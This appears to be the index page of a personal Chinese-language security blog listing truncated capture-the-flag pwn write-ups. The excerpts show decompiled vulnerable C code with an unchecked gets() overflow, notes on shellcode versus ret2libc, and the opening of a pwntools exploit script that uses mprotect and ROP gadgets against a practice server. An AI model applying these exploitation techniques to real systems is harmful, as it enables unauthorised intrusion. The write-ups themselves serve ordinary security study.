Mr.Be1ieVe's Treasure

路虽远行则将至，事虽难做则必成

babyheap_0ctf_2017

参考wp:https://blog.csdn.net/weixin_42151611/article/details/98119213?fp

Posted by Mr.Be1ieVe on Sunday, February 2, 2020

ciscn_2019_s_9

啥保护没开，第一时间考虑shellcode 另外leak只有50，leak多才考虑直接走rop 尝试过ret2libc,但是怎么都调不出来= = shellcode

Posted by Mr.Be1ieVe on Saturday, January 25, 2020

buu-ciscn_2019-c_1 WP

// local variable allocation has failed, the output may be wrong! int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [rsp+Ch] [rbp-4h] init(*(_QWORD *)&argc, argv, envp); puts("EEEEEEE hh iii "); puts("EE mm mm mmmm aa aa cccc hh nn nnn eee "); puts("EEEEE mmm mm mm aa aaa cc hhhhhh iii nnn nn ee e "); puts("EE mmm mm mm aa aaa cc hh hh

Posted by Mr.Be1ieVe on Monday, January 13, 2020

ciscn_2019_n_1 WP

int func() { int result; // eax char v1; // [rsp+0h] [rbp-30h] float v2; // [rsp+2Ch] [rbp-4h] v2 = 0.0; puts("Let's guess the number."); gets(&v1); if ( v2 == 11.28125 ) result = system("cat /flag"); else result = puts("Its value should be 11.28125"); return result; } 看见==我还尝试了一下’a&rsqu

Posted by Mr.Be1ieVe on Monday, January 13, 2020

get_started_3dsctf_2016

mprotect函数原型： int mprotect(void *addr, size_t len, int prot); addr 内存启始地址 len 修改内存的长度 prot 内存的权限 [ 所以得到exp: from pwn import * elf = ELF('./get_started_3dsctf_2016') sh = elf.process() #sh = remote('node3.buuoj.cn',27037) pop3_ret = 0x804951D #为了后

Posted by Mr.Be1ieVe on Monday, January 13, 2020

安全运营，兼任应用安全、基础安全。

FEATURED TAGS

awd buu ctf hackthebox linux使用 xray 专业学习基础知识学习笔记